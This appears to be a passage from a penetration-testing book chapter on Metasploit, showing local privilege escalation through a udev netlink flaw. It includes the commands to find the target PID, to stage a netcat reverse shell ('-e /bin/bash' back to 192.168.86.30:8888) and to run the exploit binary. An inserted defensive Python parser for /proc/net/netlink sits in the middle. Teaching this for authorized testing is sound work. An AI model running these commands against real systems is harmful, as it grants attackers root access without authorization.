194 | Chapter 6: Owning Metasploit
You'll notice there are no prompts after exploitation. That's an artifact of this exploit and the user we have exploited. Just because we don't get a prompt doesn't mean we haven't compromised the system. Just start sending commands to see if they are accepted.
We aren't ready to perform the exploit, though. We have some work to do. The exploit works by injecting into a running process. First, we need to identify the PID we are going to inject into. We can use the proc pseudo filesystem, which stores information associated with processes. We are looking for the PID associated with the netlink socket that udev uses. We find that to be 2686 in Example 6-17. To verify that, we can just double-check against the PID for the udev process. The PID we need to infect is going to be one below the udev PID. We can see that the udev PID is 2687, which is one above the PID we had already identified. This means that we know the PID to use, but we still need to stage a bash script that our exploit is going to call. We populate that script with a call to netcat, which will open up a connection back to the Kali system, where we'll create a listener using netcat.
Example 6-17. Privilege escalation using udev vulnerability

cat /proc/net/netlink
sk       Eth Pid    Groups   Rmem Wmem Dump     Locks
ddf0e800 0   0      00000000 0    0    00000000 2
df7df400 4   0      00000000 0    0    00000000 2
dd39d800 7   0      00000000 0    0    00000000 2
df16f600 9   0      00000000 0    0    00000000 2
dd82f400 10  0      00000000 0    0    00000000 2
ddf0ec00 15  0      00000000 0    0    00000000 2
dccbe600 15  2686   00000001 0    0    00000000 2
de12d800 16  0      00000000 0    0    00000000 2
df93e400 18  0      00000000 0    0    00000000 2
ps auxww | grep udev
root      2687  0.0  0.1   2092   620 ?        S
echo "#!/bin/bash" > /tmp/run
echo "/bin/netcat -e /bin/bash 192.168.86.30 8888" >> /tmp/run
./tuxbowling 2686
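As an added auditing example (not code from the book), here is a small Python parser for the /proc/net/netlink table that the text reads by hand. The sample table is constructed from the rows in Example 6-17, and the protocol names are taken from <linux/netlink.h>; the helper reports which user-space processes hold a socket in each netlink family, which is the cross-check an administrator would run to confirm that only udev is subscribed to kernel uevents.

```python
# Constructed sample in the format of /proc/net/netlink (rows from Example 6-17).
# On a live host, pass the contents of the file itself to parse_netlink().
SAMPLE = """\
sk       Eth Pid    Groups   Rmem Wmem Dump     Locks
ddf0e800 0   0      00000000 0    0    00000000 2
df7df400 4   0      00000000 0    0    00000000 2
ddf0ec00 15  0      00000000 0    0    00000000 2
dccbe600 15  2686   00000001 0    0    00000000 2
de12d800 16  0      00000000 0    0    00000000 2
"""

# Netlink protocol numbers from <linux/netlink.h>; udev listens on 15.
FAMILIES = {
    0: "NETLINK_ROUTE", 4: "NETLINK_SOCK_DIAG", 7: "NETLINK_SELINUX",
    9: "NETLINK_AUDIT", 10: "NETLINK_FIB_LOOKUP",
    15: "NETLINK_KOBJECT_UEVENT", 16: "NETLINK_GENERIC",
    18: "NETLINK_SCSITRANSPORT",
}


def parse_netlink(text):
    """Parse the /proc/net/netlink table into dicts; the header is skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 8 or parts[0] == "sk":
            continue
        rows.append({
            "sk": parts[0],
            "proto": int(parts[1]),        # netlink family (the Eth column)
            "pid": int(parts[2]),          # port id; 0 means the kernel owns it
            "groups": int(parts[3], 16),   # multicast group bitmask
        })
    return rows


def user_subscribers(rows, proto=15):
    """Return (port id, groups) for sockets of one family held by user space.

    For NETLINK_KOBJECT_UEVENT, group bit 1 is the kernel uevent multicast
    group that udev joins, so a nonzero port id here is the uevent listener.
    """
    return [(r["pid"], r["groups"]) for r in rows
            if r["proto"] == proto and r["pid"] != 0]


def family_name(proto):
    return FAMILIES.get(proto, "NETLINK_%d" % proto)


if __name__ == "__main__":
    rows = parse_netlink(SAMPLE)
    for proto in sorted({r["proto"] for r in rows}):
        print(family_name(proto), user_subscribers(rows, proto))
```

Compare the reported port ids against the PIDs in ps: an unexpected process on NETLINK_KOBJECT_UEVENT is worth a closer look.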
On the Kali end, we would use netcat -l -p 8888, which tells netcat to start up a listener on port 8888. I selected that port, but there is nothing special about it. You could use any port you wanted so you have a listener. Remember, you won't get a prompt or any indication that you are connected on the netcat listener end. You can, again, just start to type commands. The first thing you can do is run whoami to determine what user you are connected as. After running the exploit, you will find that you are root. You will also find that you have been placed into the root of the filesystem (/).